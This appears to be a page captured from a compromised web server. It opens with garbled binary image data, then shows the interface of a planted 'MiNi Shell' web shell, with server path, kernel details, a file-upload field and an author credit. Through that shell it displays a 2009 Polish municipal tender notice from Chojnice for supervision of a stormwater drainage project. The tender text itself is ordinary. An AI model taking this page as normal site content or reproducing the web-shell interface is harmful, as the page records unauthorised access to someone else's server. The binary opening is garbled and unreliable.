JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091007/172063-N-2009.html

<p class="kh_header"><b>Chojnice: Pełnienie funkcji Inspektora Nadzoru Inwestorskiego przy realizacji projektu pn. 
Poprawa bilansu wodnego w mieście Chojnice poprzez przebudowę i rozbudowę systemu odbioru, odprowadzania i oczyszczania wód opadowych i roztopowych w części zlewni Strugi Jarcewskiej</b><br>
<b>Numer ogłoszenia: 172063 - 2009; data zamieszczenia: 07.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Stary Rynek 1, 89-600 Chojnice, woj. pomorskie, tel. 052 3971800, faks 052 3972194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miastochojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inspektora Nadzoru Inwestorskiego przy realizacji projektu pn. 
Poprawa bilansu wodnego w mieście Chojnice poprzez przebudowę i rozbudowę systemu odbioru, odprowadzania i oczyszczania wód opadowych i roztopowych w części zlewni Strugi Jarcewskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie funkcji Inspektora Nadzoru Inwestorskiego wraz z kontrolą rozliczenia realizacji projektu pn. Poprawa bilansu wodnego w mieście Chojnice poprzez przebudowę i rozbudowę systemu odbioru, odprowadzania i oczyszczania wód opadowych i roztopowych w części zlewni Strugi Jarcewskiej, który uzyskał decyzję Zarządu Województwa Pomorskiego o dofinansowaniu ze środków finansowych Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013.

2. Charakterystyka zadania budowlanego, nad którym sprawowany będzie nadzór.
Ww inwestycja obejmuje następujące branże:
a)	konstrukcyjno-budowlana
b)	mostowa
c)	sanitarna
d)	elektryczna

Zakres robót w ramach poszczególnych branż:
Branża konstrukcyjno-budowlana:
-roboty przygotowawcze - usunięcie pni i karczy wraz z oczyszczeniem terenu;
-rozbudowa koryta Strugi Jarcewskiej i kanałów (łączna dł. 1115m)
-odbudowa koryt rowów odwadniających;
-budowa zbiorników małej retencji ( I - 1,38ha, II-0,44 ha, III - 0,48 ha) o łącznej pojemności 65.180 m3;
-nasypy, podwyższenie terenu i zasypywanie niecek bezodpływowych i obniżeń terenowych - 21.860m3;
-usunięcie ziemi roślinnej z obszarów terenu objętego podwyższeniem o pow. F=3,90ha - 3.684m3;
-wykonanie drenażu odwadniająco-napowietrzającego PCV O 7,5cm w obsypce z pospółki;
-wykonanie nawierzchni z płyt drogowych ażurowych dla dróg dojazdowych i placów manewrowych przy zestawach oczyszczających ścieki opadowe;
-Wycinka drzew wraz z ich wywozem i uprzątnięciem terenu zgodnie z  Inwentaryzacją drzewostanu przeznaczonego do usunięcia w Parku 1000-lecia
Branża mostowa:
-budowa 3 mostów - szer. - 5,0m, dł. = 12,29m, fundamentowanych na palach Franki
-budowa 5 kładek - szer. - 4,0 m, dł. = 12,29m, fundamentowanych na palach Franki
Branża sanitarna:
-wymiana przepompowni
-montaż 3 zestawów do oczyszczenia ścieków deszczowych do objętości przepływów q = 200 l na s
-budowa wylotu O300 typ E-1
-wykonanie budowli piętrząco-upustowej
-budowa wlotów i wylotów rurociągów - 5 szt.
-budowa przepustu typu P-2 O80 cm - 5 szt.
-budowa studzienki kanalizacyjnej wlotowej 1,20m, H=2,0m 
-budowa zastawki Z-7-4, światło B=1,5, piętrzenie H=1,5m
Branża elektryczna:
-budowa rozdzielni głównej dla zasilania projektowanych obiektów technologicznych
-przebudowa i budowa linii kablowej zasilającej: pompownię, agregaty napowietrzająco-fontannowe, zestawy oczyszczające ścieki opadowe
-usunięcie kolizji istniejącego oświetlenia w obszarze objętym projektem z projektowanymi obiektami i urządzeniami.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium w wysokości  5.000,-  PLN 
2.W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wpłacić przelewem na konto Urzędu Miejskiego w Chojnicach prowadzone przez Bank Spółdzielczy w Chojnicach: nr 35 8146 0003 0304 2000 0040.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy:
1.	nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 pzp  oraz spełniają wymogi określone w art. 22 ust. pzp, tj.:
2.	Warunki szczegółowe:
a)	wskażą do wykonania niniejszego zamówienia osoby wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia (załącznik nr 5 do SIWZ): 
- 1 osobę na stanowisko Inspektora nadzoru inwestorskiego posiadającą co najmniej 4-letnie doświadczenie zawodowe w kierowaniu zespołem ludzi prowadzącym nadzór nad inwestycjami budowlanymi, pełniącą co najmniej 1 raz funkcję Inspektora Nadzoru Inwestorskiego przy realizacji zakończonej inwestycji budowlanej z udziałem środków unijnych, o całkowitej wartości inwestycji minimum 6,0 mln zł (brutto). Od Inspektora Nadzoru Inwestorskiego wymagana jest znajomość, programów unijnych (w szczególności RPO WP na lata 2007-2013).
- co najmniej 1 osobę na stanowisko inspektora nadzoru w specjalności konstrukcyjno - budowlanej bez ograniczeń posiadającą uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności budowlano-konstrukcyjnej bez ograniczeń lub równoważne oraz członkowstwo w Okręgowej Izbie Inżynierów Budownictwa, co najmniej 5-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową,
- co najmniej 1 osobę na stanowisko inspektora nadzoru w specjalności mostowej - posiadającą uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności mostowej lub równoważne oraz członkowstwo w Okręgowej Izbie Inżynierów Budownictwa, co najmniej 5-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową,
- co najmniej 1 osobę na stanowisko inspektora nadzoru w specjalności instalacyjnej (sanitarnej)- posiadającą uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych lub równoważne oraz członkowstwo w Okręgowej Izbie Inżynierów Budownictwa, co najmniej 5-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową,
- co najmniej 1 osobę na stanowisko inspektora nadzoru w specjalności instalacyjnej (elektrycznej)- posiadającą uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub równoważne oraz członkowstwo w Okręgowej Izbie Inżynierów Budownictwa, co najmniej 5-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową,
- co najmniej 1 osobę na stanowisko specjalisty ds. rozliczeń - posiadającą wykształcenie ekonomiczne oraz doświadczenie zawodowe w rozliczeniu przynajmniej jednej zakończonej inwestycji realizowanej z udziałem środków unijnych i krajowych o wartości nie mniejszej niż 6,0 mln zł (brutto). 
Osoby posiadające uprawnienia budowlane wydane poza Rzeczpospolita Polska w krajach UE muszą wykazać się odpowiednim potwierdzeniem swoich uprawnień przez właściwą Okręgową Izbę Inżynierów Budownictwa. 

b)	posiadają doświadczenie w nadzorowaniu i rozliczaniu robót i wykażą, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej 1 usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia - tj. usługę polegającą na pełnieniu funkcji Inżyniera Kontraktu, Inwestora Zastępczego lub Inspektora Nadzoru Inwestorskiego przy realizacji inwestycji dotyczącej budowy i/lub przebudowy urządzeń melioracyjnych służących do odprowadzania i oczyszczania wód deszczowych o wartości nie mniejszej niż 6 mln zł brutto. Załącznik nr 4 do SIWZ.

c)	posiadają doświadczenie w rozliczaniu inwestycji realizowanych przy współfinansowaniu ze środków pochodzących z funduszy krajowych i/lub unijnych i w okresie ostatnich 3 lat, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie dokonali rozliczenia środków finansowych z wymienionych źródeł pozyskanych na realizację zadania o wartości nie mniejszej niż 6 mln zł brutto. Załącznik nr 4 do SIWZ.

d)	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 300.000,00 zł.

e)	na czas realizacji zamówienia będą dysponować biurem na terenie miasta Chojnice..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta winna zawierać:
1.	wypełniony formularz oferty - zgodny z wzorem stanowiącym Załącznik Nr 1 do SIWZ 
2.	dowód wniesienia wadium
3.	oświadczenie Wykonawcy dotyczące  art. 22 ust. 1 i art. 24 ust. 1 i 2 ustawy pzp - zgodny z wzorem stanowiącym Załącznik Nr 3 do SIWZ 
4.	aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji                                                    działalności gospodarczej wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert
5.	Wykaz zadań, przy realizacji których Wykonawca pełnił w okresie ostatnich 3 lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, obowiązki Inżyniera Kontraktu, Inwestora Zastępczego lub Inspektora Nadzoru Inwestorskiego. Do wykazu należy załączyć dokumenty potwierdzające, że wszystkie wykazane usługi zostały wykonane należycie - załącznik nr 4 do SIWZ.
W wykazie należy umieścić tylko te usługi, które odpowiadają warunkowi określonemu w pkt IV.2.b)
6.	Wykaz zadań, dla których Wykonawca w okresie ostatnich 3 lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie uczestniczył w rozliczaniu inwestycji realizowanych przy współfinansowaniu ze środków pochodzących z funduszy krajowych i/lub unijnych. Do wykazu należy załączyć dokumenty potwierdzające, że wszystkie wykazane usługi zostały wykonane należycie - załącznik nr 4 do SIWZ. 
W wykazie należy umieścić tylko te usługi, które odpowiadają warunkowi określonemu w pkt IV.2.c) 
7.	Wykaz osób które będą uczestniczyć w wykonaniu zamówienia oraz dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia  posiadają wskazane w pkt IV.2.a) uprawnienia budowlane + aktualna przynależność do Izby Inżynierów Budownictwa lub inny równoważny dokument o wpisie do rejestru zawodowego zgodnie z warunkami ustanowionymi przez prawo państw członkowskich UE - załącznik nr 5 do SIWZ
8.	Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 300.000,00 zł. Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jeden wspólny dokument.
9.	Oświadczenie Wykonawcy, że na czas realizacji zamówienia będzie dysponować biurem na terenie miasta Chojnice - do samodzielnego opracowania.
10.	Pełnomocnictwo do podpisania oferty, o ile prawo do jej podpisania nie wynika z innych dokumentów złożonych wraz z ofertą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.miastochojnice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Chojnicach
Wydział Programów Rozwojowych i Współpracy Zagranicznej
Stary Rynek 1 
89-600 Chojnice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2009 godzina 10:00, miejsce: Urząd Miejski w Chojnicach, ul. Stary Rynek 1, 89-600 Chojnice, Biuro Podawcze pok. nr 306.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com